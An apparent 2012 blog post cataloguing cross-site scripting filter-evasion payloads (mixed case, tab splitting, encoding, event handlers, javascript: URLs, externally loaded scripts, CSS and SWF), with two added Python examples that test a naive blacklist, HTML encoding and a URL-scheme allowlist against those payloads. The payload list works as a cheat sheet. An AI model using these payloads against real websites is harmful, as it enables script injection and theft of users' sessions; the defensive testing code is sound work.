
Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use an extension other than .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> the gaps are tab characters
         -> the gaps are newline characters

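Added example (not part of the original post, and not from any project it mentions): a small Python check that feeds the payloads from items 1, 2, 5 and 6 above, reproduced here as constructed test data, through two different defences. The first is a hypothetical keyword blacklist of the sort these tricks are aimed at; the second is contextual output encoding with html.escape. looks_active is a demonstration-only heuristic written for this example, not a sanitizer.

```python
import html
import re

# Constructed test data: the post's own payloads from items 1, 2, 5 and 6.
# Tabs and newlines are written as \t and \n because the forum rendered them as spaces.
PAYLOADS = [
    "<sCript>alert('d')</scRipT>",                  # item 1: mixed case
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',           # item 2: extra attribute before SRC
    '<SCRIPT/SRC="t.js"></SCRIPT>',                 # item 5: slash instead of a space
    "<img src=\"jav\tascr\nipt:alert('XSS3')\">",   # item 6: tab and newline inside the scheme
]

# Hypothetical filter for this example: literal, case-sensitive removal of
# "<script>", "</script>" and "javascript:", the kind of blacklist these tricks defeat.
NAIVE_PATTERN = re.compile(r"<script>|</script>|javascript:")


def naive_blacklist(value: str) -> str:
    """Strip the blacklisted keywords and return whatever is left."""
    return NAIVE_PATTERN.sub("", value)


def encode_for_html_body(value: str) -> str:
    """Contextual output encoding for HTML text content and quoted attributes:
    <, >, &, " and ' become character references, so the browser shows the
    payload as literal text instead of parsing it as markup."""
    return html.escape(value, quote=True)


def looks_active(value: str) -> bool:
    """Demonstration-only check (not a sanitizer): after dropping the tab/CR/LF
    characters a browser ignores, is there still a raw tag named script, or a
    raw tag whose attributes carry a javascript: URL?"""
    collapsed = re.sub(r"[\t\n\r]", "", value)
    pattern = r"<\s*/?\s*script|<[^>]*javascript:"
    return re.search(pattern, collapsed, re.IGNORECASE) is not None


def evaluate(payloads):
    """For each payload return (still active after the blacklist, still active after encoding)."""
    return [
        (looks_active(naive_blacklist(p)), looks_active(encode_for_html_body(p)))
        for p in payloads
    ]


if __name__ == "__main__":
    for payload, (after_blacklist, after_encoding) in zip(PAYLOADS, evaluate(PAYLOADS)):
        print(f"{payload!r:50} blacklist leaves it active: {after_blacklist}  "
              f"encoding leaves it active: {after_encoding}")
```

Run it and every payload survives the blacklist but none survive encoding: the tricks all rely on the filter looking for an exact string, while encoding changes the characters the browser needs to start a tag at all. html.escape only covers HTML text and quoted-attribute contexts; a value placed into a URL attribute, a style block or a script block needs the encoder or validator for that context.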

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert('XSS')</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url()

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
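Added example (not from the original post): a Python validator for values that land in src, href or url() positions, covering the javascript: vectors of items 1, 6, 8 and 14 as constructed test inputs. It normalises the value the way a browser does before resolving it, then allows only relative references and an allowlisted set of schemes. SAFE_SCHEMES, the sample inputs and the function names are this example's own assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Allowlist of URL schemes acceptable in src/href/url() positions.
# Hypothetical policy for this example; everything not listed is rejected.
SAFE_SCHEMES = {"http", "https", "mailto"}

_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_INNER_TAB_NEWLINE = re.compile(r"[\t\n\r]")


def normalise_like_browser(raw_attribute_value: str) -> str:
    """Apply the transformations a browser applies before it resolves an
    attribute URL: decode HTML character references (item 8's hex/decimal
    encoding), strip leading and trailing C0 controls and spaces, and remove
    tab, CR and LF anywhere in the string (item 6)."""
    value = html.unescape(raw_attribute_value)
    value = _EDGE_CONTROLS.sub("", value)
    return _INNER_TAB_NEWLINE.sub("", value)


def is_safe_url(raw_attribute_value: str) -> bool:
    """True only if the normalised URL is relative or carries an allowlisted
    scheme. The comparison is case-insensitive, so JaVaScRiPt: is rejected too."""
    url = normalise_like_browser(raw_attribute_value)
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:      # malformed input such as an unbalanced IPv6 literal
        return False
    if scheme == "":
        return True         # relative reference, resolved against the page's own origin
    return scheme in SAFE_SCHEMES


# Constructed inputs: the post's javascript: vectors plus benign values,
# each mapped to the verdict the validator should give.
SAMPLES = {
    "https://example.com/logo.png": True,
    "/static/style.css": True,
    "HTTPS://Example.com/": True,
    "javascript:alert('XSS3')": False,           # item 14
    "jav\tascr\nipt:alert('XSS3')": False,       # item 6: tab and newline in the scheme
    "JaVaScRiPt:alert('XSS')": False,            # item 1: mixed case
    " \x01javascript:alert('XSS')": False,       # leading space and control character
    "javascript&#58;alert('abc')": False,        # item 8: ':' as a character reference
    "&#x6A;avascript:alert('XSS')": False,       # item 8: 'j' hex encoded
}


def check_samples(samples=SAMPLES):
    """Return the inputs whose verdict differs from the expected one (empty means all agree)."""
    return [url for url, expected in samples.items() if is_safe_url(url) != expected]


if __name__ == "__main__":
    for url, expected in SAMPLES.items():
        print(f"{url!r:40} safe={is_safe_url(url)} (expected {expected})")
    print("mismatches:", check_samples())
```

For CSS url() values (items 4, 7 and 14) the same scheme check applies, but the decoding step has to handle CSS backslash escapes instead of HTML character references. Scheme allowlisting on URL attributes and output encoding on text are complementary to a Content-Security-Policy that disallows inline script; none of the three replaces the others.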